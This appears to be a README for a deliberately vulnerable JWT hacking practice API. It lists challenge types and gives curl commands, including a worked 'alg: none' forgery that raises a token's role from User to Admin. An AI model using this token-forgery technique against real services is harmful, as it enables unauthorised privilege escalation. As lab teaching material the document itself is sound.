# JWT Hacking
Each one of these challenges an attacker can alter a JWT token. To successfully complete these challenges, you must solve the challenge by forging a JWT and sending it back to the API. If you are successful, the API
will display a success message.
### NOTE:
Sending back an unaltered JWT will display it being valid, but yet you did not hack anything. To get credit, you must change your role from `User` to `Admin` in the token. When it prints a success message, it will
show your Role.
Your role in the success message must show `Admin` (or at the very least any value which is not `User` ) to get credit.
## Basic Usage
The API can be interacted with simply using curl.
* Basic request
```
curl https://jwt.ethicalhacking.academy/
```
* help document
```
curl https://jwt.ethicalhacking.academy/helpme
```
- All POST bodies must be json formatted.
- All POST requests must set the `content-type` request header: `application/json'`
- For inititating a JWT challenge, POST the following JSON struct to path `/jwt`, where `${CHALLENGE_ID}` is the Id of the challenge (more below)
## Attempting/Solving Challenges
Challenges are initiated by calling the `/jwt` path with a payload `{"attack": "${CHALLENGE_ID}"}` specifying the attack you wish to attempt
Challenges are solved by calling the `/jwt/{CHALLENG_ID}` path with a payload `{"jwt_token": "${JWT}"}`
* initiating a challenge
```
curl -X POST -H "content-type: application/json" -d '{"attack": "${CHALLENGE_ID}"}' https://jwt.ethicalhacking.academy/jwt
```
* solving a challenge
```
curl -X POST -H "content-type: application/json" -d '{"jwt_token": "${JWT}"}' https://jwt.ethicalhacking.academy/jwt/${CHALLENG_ID}
```
## Supported CHALLENGE_ID Values
Supported values for `${CHALLENGE_ID}`
- none
- weak-secret
- key-confusion
- key-injection
- jku
- x5u
- kid00
## Examples
Starting a challenge of type `none` and attempting to solve it
* request to start `none` challenge
```
curl -X POST -H "content-type: application/json" -d '{"attack": "none"}' https://jwt.ethicalhacking.academy/jwt
```
* response to request to start `none` challenge
```
{
"jwt":
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaXJzdG5hbWUiOiJIYXJyaWVyIiwibGFzdG5hbWUiOiJEdSBCb2lzIiwiYWNjb3VudCI6IkhhcnJ5RHVCb2lzIiwicm9sZSI6IlVzZXIiLCJpYXQiOjE2OTg4ODIxODUsImF1ZCI6Imh0dHBzOi8vand0LmV0aGljYWxoYWNraW5nLmFjYWRlbXkvand0L25vbmUifQ.hwKmfHOW9TKOXe0XqYKfliFo4unTYD8uTQ679LVN8cM",
"endpoint": "https://jwt.ethicalhacking.academy/jwt/none"
}
```
* Example unsuccessful attempt to solve `none` challenge
```
curl -X POST -H "content-type: application/json" -d '{"jwt_token":
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaXJzdG5hbWUiOiJoZWxsbyIsImxhc3RuYW1lIjoiRHUgQm9pcyIsImFjY291bnQiOiJIYXJyeUR1Qm9pcyIsInJvbGUiOiJVc2VyIiwiaWF0IjoxNjk4ODgyMTg1LCJhdWQiOiJodHRwczovL2p3dC5ldGhpY2FsaGFja2luZy5hY2FkZW15L2p3dC9ub25lIn0.5oVTyBWOOUR8jAfOL-l1Rc3maoEcKQPUrPckilxD7wM"}'
https://jwt.ethicalhacking.academy/jwt/none
{
"name": "JsonWebTokenError",
"message": "invalid signature"
}
```
* Example successful attempt to solve `none` challenge
```
curl -X POST -H "content-type: application/json" -d '{"jwt_token":
"eyJhbCCiOiJub25lIiwiAAlwLLoiSldUIn0.eyJmaXJzdG5hbWUiOiJIYXJZZWVyIiwibGFzdG5hbWUiOiJEdSBCb2lzIiwiYWNjb3VudCI6IkhhcnJ5RHVCb2lzIiwicm9sZSI6IkFkbWluIiwiaWF0IjoxNjk4ODgyNTI5LCJhdWQiOiJodHRwczovL2p3dC5ldGhpY2FsaGFja2luZy5hY2FkZW15L2p3dC9ub25lIn0."}'
https://jwt.ethicalhacking.academy/jwt/none
{
"message": "Wed, 01 Nov 2023 23:31:35 GMTCongrats!! You've solved the JWT challenge!!",
"jwt_token": {
"header": {
"alg": "none",
"typ": "JWT"
},
"payload": {
"firstname": "Harrier",
"lastname": "Du Bois",
"account": "HarryDuBois",
"role": "Admin",
"iat": 1698882529,
"aud": "https://jwt.ethicalhacking.academy/jwt/none"
},
"signature": ""
}
}
```
Sign in with Wallet
Connect another wallet